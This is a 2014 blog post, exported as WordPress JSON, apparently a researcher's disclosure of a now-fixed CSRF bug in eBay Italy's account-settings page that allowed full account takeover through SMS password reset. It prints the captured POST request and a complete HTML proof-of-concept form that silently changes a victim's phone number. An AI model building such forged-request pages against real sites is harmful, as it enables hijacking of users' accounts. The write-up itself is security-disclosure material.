{"id":99,"date":"2014-07-26T11:12:47","date_gmt":"2014-07-26T09:12:47","guid":{"rendered":"https:\/\/hacksecproject.com\/?p=99"},"modified":"2018-11-23T17:00:16","modified_gmt":"2018-11-23T17:00:16","slug":"ebay-from-csrf-to-full-takeover-account-of-any-user","status":"publish","type":"post","link":"https:\/\/hacksecproject.com\/?p=99","title":{"rendered":"Ebay: From CSRF to Full Takeover Account of any user"},"content":{"rendered":"<p>After the Ebay Data Breach i started looking for that bug that may have been exploited from hackers to steal credentials of more that 100 million Ebay user&#8217;s account.So i focused my attention on the Ebay recovery account procedures.If you are already a Ebay user you can reset the password of your account through three procedures:<\/p>\n<p>1) Email Address:An email to the registered email-address will be sent with a reset link<\/p>\n<p>2)SMS: An SMS with a 4-digits PIN will be sent from Ebay to the registered phone number<\/p>\n<p>3)Phone call: A phone call will be made from Ebay to reset password of the Ebay user&#8217;s account<!--more--><\/p>\n<p>The bug i found is in the SMS procedure.This CSRF bug allows me to set a new phone number in the victim&#8217;s account and subsequently i can use the SMS procedure to obtain the PIN to reset password of Ebay victim&#8217;s account.To set a new phone number in our Ebay account we have to:<\/p>\n<p>1)Go to <a title=\"https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationShow\" href=\"https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationShow\">https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationShow<\/a><\/p>\n<p>2)Fill in all the forms with the desired values<\/p>\n<p>3)Click on the button to save changes<\/p>\n<p><a href=\"https:\/\/hacksecproject.com\/wp-content\/uploads\/2014\/06\/Schermata-del-2014-06-04-122719.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-110 size-medium\" src=\"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/Schermata-del-2014-06-04-122719.png\" alt=\"Schermata del 2014-06-04 12:27:19\" width=\"1360\" height=\"768\" \/><\/a><\/p>\n<p>Once clicked on it a POST request like the following will be generated:<\/p>\n<p>POST\u00a0\u00a0 https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll<\/p>\n<p>Host: scgi.ebay.it<br \/>\nUser-Agent: myuseragent<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<br \/>\nAccept-Language: en-US,en;q=0.5<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nReferer: https:\/\/scgi.ebay.it\/ws\/eBayISAPI.dll?ChangeRegistrationPreview<br \/>\nCookie: mycookies<br \/>\nConnection: keep-alive<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 758<\/p>\n<p>MfcISAPICommand=ChangeRegistration&amp;userid=&amp;pass=&amp;mid=&amp;hmid=&amp;firstname=Andrea&amp;lastname=Santese&amp;middleinitial=&amp;nameAlt=&amp;nameAlt2=&amp;name=Andrea++Santese&amp;company=&amp;address=via+A.AAAAA&amp;city=Maglie&amp;state=LE&amp;fullnameAlt=&amp;companyAlt=&amp;addressAlt=11&amp;cityAlt=&amp;stateAlt=&amp;zip=73024&amp;country=Italia&amp;countryid=101&amp;dayphone=++32709869473270986947+&amp;nightphone=+++&amp;faxphone=&amp;dayphone1=3270986948&amp;dayphone2=&amp;dayphone3=&amp;dayphone4=&amp;nightphone1=&amp;nightphone2=&amp;nightphone3=&amp;nightphone4=&amp;gender=Non+specificato&amp;billingcurrency=7&amp;personalId=&amp;personalIdType=&amp;bizTypeCode=&amp;bizNumber1=&amp;bizNumber2=&amp;taxIdNumber=&amp;accountOperatorName=&amp;srt=01000100000040018e9fb8c3652034dfa260bc532183a8ddb8b0625bb39c554c5798fd1ae45a250dfdbd26d445eda420b25052c714e49cabe4a038ceee0436e85ec32fb6903c4f&amp;salutation=<\/p>\n<p>The first time i look at this POST request i noticed that there was the &#8220;srt&#8221; parameter and i thought it was an anti-CSRF token but after few attempts i noticed that the &#8220;srt&#8221; parameter and its value are not checked from server so they can be omitted.So i realized an HTML page that once clicked by the victim, will set a new phone number (attacker&#8217;s phone number) in the victim&#8217;s account.<\/p>\n<p>This is the POC:<\/p>\n<p>&lt;html&gt;<\/p>\n<p>&lt;body&gt;<\/p>\n<p>&lt;form method=&#8221;POST&#8221; name=&#8221;form0&#8243; action=&#8221;https:\/\/scgi.ebay.it:443\/ws\/eBayISAPI.dll&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;MfcISAPICommand&#8221; value=&#8221;ChangeRegistration&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;userid&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;pass&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;mid&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;hmid&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;firstname&#8221; value=&#8221;firstname&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;lastname&#8221; value=&#8221;lastname&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;middleinitial&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nameAlt&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nameAlt2&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;name&#8221; value=&#8221;firstname lastname&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;company&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;address&#8221; value=&#8221;via A.AAAAA&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;city&#8221; value=&#8221;city&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;state&#8221; value=&#8221;state&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;fullnameAlt&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;companyAlt&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;addressAlt&#8221; value=&#8221;11&#8243;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;cityAlt&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;stateAlt&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;zip&#8221; value=&#8221;zipcode&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;country&#8221; value=&#8221;Italia&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;countryid&#8221; value=&#8221;101&#8243;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;dayphone&#8221; value=&#8221;\u00a0 dayphonr&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nightphone&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;faxphone&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;dayphone1&#8243; value=&#8221;dayphone1&#8243;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;dayphone2&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;dayphone3&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;dayphone4&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nightphone1&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nightphone2&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nightphone3&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;nightphone4&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;gender&#8221; value=&#8221;Non specificato&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;billingcurrency&#8221; value=&#8221;7&#8243;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;personalId&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;personalIdType&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;bizTypeCode&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;bizNumber1&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;bizNumber2&#8243; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;taxIdNumber&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;accountOperatorName&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;salutation&#8221; value=&#8221;&#8221;\/&gt;<br \/>\n&lt;\/form&gt;<\/p>\n<p>&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<p>Once the victim has clicked on this HTML page a new phone number will be setted in the victim&#8217;s account and the attacker can subsequently reset password of the victim&#8217;s account through the SMS procedure.<\/p>\n<p>This is the Video PoC:<br \/>\n<iframe loading=\"lazy\" src=\"\/\/www.youtube.com\/embed\/HIAz1kldZtk\" width=\"853\" height=\"480\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p>The bug has now been fixed.<\/p>\n<p>&nbsp;<\/p>\n<h2 class=\"article-excerpt\"><\/h2>\n","protected":false},"excerpt":{"rendered":"<p>After the Ebay Data Breach i started looking for that bug that may have been exploited from hackers to steal credentials of more that 100 million Ebay user&#8217;s account.So i focused my attention on the Ebay recovery account procedures.If you are already a Ebay user you can reset the password of your account through three &hellip; <a href=\"https:\/\/hacksecproject.com\/?p=99\" class=\"more-link\">Leggi tutto<span class=\"screen-reader-text\"> &#8220;Ebay: From CSRF to Full Takeover Account of any user&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":18,"comment_status":"closed","ping_status":"closed","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-99","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-en"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ebay: From CSRF to Full Takeover Account of any user<\/title>\n<meta name=\"description\" content=\"In this Write-Up i&#039;ll describe how Full Takeover Account is possible in Ebay\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hacksecproject.com\/?p=99\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ebay: From CSRF to Full Takeover Account of any user\" \/>\n<meta property=\"og:description\" content=\"In this Write-Up i&#039;ll describe how Full Takeover Account is possible in Ebay\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hacksecproject.com\/?p=99\" \/>\n<meta property=\"article:published_time\" content=\"2014-07-26T09:12:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-11-23T17:00:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"800\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Medu554\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Medu554\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99\"},\"author\":{\"name\":\"Medu554\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\"},\"headline\":\"Ebay: From CSRF to Full Takeover Account of any user\",\"datePublished\":\"2014-07-26T09:12:47+00:00\",\"dateModified\":\"2018-11-23T17:00:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99\"},\"wordCount\":920,\"image\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/nuovo-logo-ebay.png\",\"articleSection\":[\"Uncategorized\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99\",\"name\":\"Ebay: From CSRF to Full Takeover Account of any user\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/nuovo-logo-ebay.png\",\"datePublished\":\"2014-07-26T09:12:47+00:00\",\"dateModified\":\"2018-11-23T17:00:16+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\"},\"description\":\"In this Write-Up i'll describe how Full Takeover Account is possible in Ebay\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hacksecproject.com\\\/?p=99\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#primaryimage\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/nuovo-logo-ebay.png\",\"contentUrl\":\"https:\\\/\\\/hacksecproject.com\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/nuovo-logo-ebay.png\",\"width\":1500,\"height\":800},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/?p=99#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hacksecproject.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ebay: From CSRF to Full Takeover Account of any user\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#website\",\"url\":\"https:\\\/\\\/hacksecproject.com\\\/\",\"name\":\"\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hacksecproject.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hacksecproject.com\\\/#\\\/schema\\\/person\\\/526444cfaef818c23a7b4e4519573689\",\"name\":\"Medu554\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g\",\"caption\":\"Medu554\"},\"url\":\"https:\\\/\\\/hacksecproject.com\\\/?author=2\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ebay: From CSRF to Full Takeover Account of any user","description":"In this Write-Up i'll describe how Full Takeover Account is possible in Ebay","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hacksecproject.com\/?p=99","og_locale":"it_IT","og_type":"article","og_title":"Ebay: From CSRF to Full Takeover Account of any user","og_description":"In this Write-Up i'll describe how Full Takeover Account is possible in Ebay","og_url":"https:\/\/hacksecproject.com\/?p=99","article_published_time":"2014-07-26T09:12:47+00:00","article_modified_time":"2018-11-23T17:00:16+00:00","og_image":[{"width":1500,"height":800,"url":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png","type":"image\/png"}],"author":"Medu554","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Medu554","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hacksecproject.com\/?p=99#article","isPartOf":{"@id":"https:\/\/hacksecproject.com\/?p=99"},"author":{"name":"Medu554","@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689"},"headline":"Ebay: From CSRF to Full Takeover Account of any user","datePublished":"2014-07-26T09:12:47+00:00","dateModified":"2018-11-23T17:00:16+00:00","mainEntityOfPage":{"@id":"https:\/\/hacksecproject.com\/?p=99"},"wordCount":920,"image":{"@id":"https:\/\/hacksecproject.com\/?p=99#primaryimage"},"thumbnailUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png","articleSection":["Uncategorized"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hacksecproject.com\/?p=99","url":"https:\/\/hacksecproject.com\/?p=99","name":"Ebay: From CSRF to Full Takeover Account of any user","isPartOf":{"@id":"https:\/\/hacksecproject.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hacksecproject.com\/?p=99#primaryimage"},"image":{"@id":"https:\/\/hacksecproject.com\/?p=99#primaryimage"},"thumbnailUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png","datePublished":"2014-07-26T09:12:47+00:00","dateModified":"2018-11-23T17:00:16+00:00","author":{"@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689"},"description":"In this Write-Up i'll describe how Full Takeover Account is possible in Ebay","breadcrumb":{"@id":"https:\/\/hacksecproject.com\/?p=99#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hacksecproject.com\/?p=99"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hacksecproject.com\/?p=99#primaryimage","url":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png","contentUrl":"https:\/\/hacksecproject.com\/wp-content\/uploads\/2018\/04\/nuovo-logo-ebay.png","width":1500,"height":800},{"@type":"BreadcrumbList","@id":"https:\/\/hacksecproject.com\/?p=99#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hacksecproject.com\/"},{"@type":"ListItem","position":2,"name":"Ebay: From CSRF to Full Takeover Account of any user"}]},{"@type":"WebSite","@id":"https:\/\/hacksecproject.com\/#website","url":"https:\/\/hacksecproject.com\/","name":"","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hacksecproject.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/hacksecproject.com\/#\/schema\/person\/526444cfaef818c23a7b4e4519573689","name":"Medu554","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/29ba1a61e7548d882dbad311db32d5e08fdc44eee25a59452ea4ac5a94ed80b3?s=96&d=mm&r=g","caption":"Medu554"},"url":"https:\/\/hacksecproject.com\/?author=2"}]}},"_links":{"self":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/99","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=99"}],"version-history":[{"count":7,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/99\/revisions"}],"predecessor-version":[{"id":283,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/posts\/99\/revisions\/283"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=\/wp\/v2\/media\/18"}],"wp:attachment":[{"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=99"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=99"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacksecproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=99"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}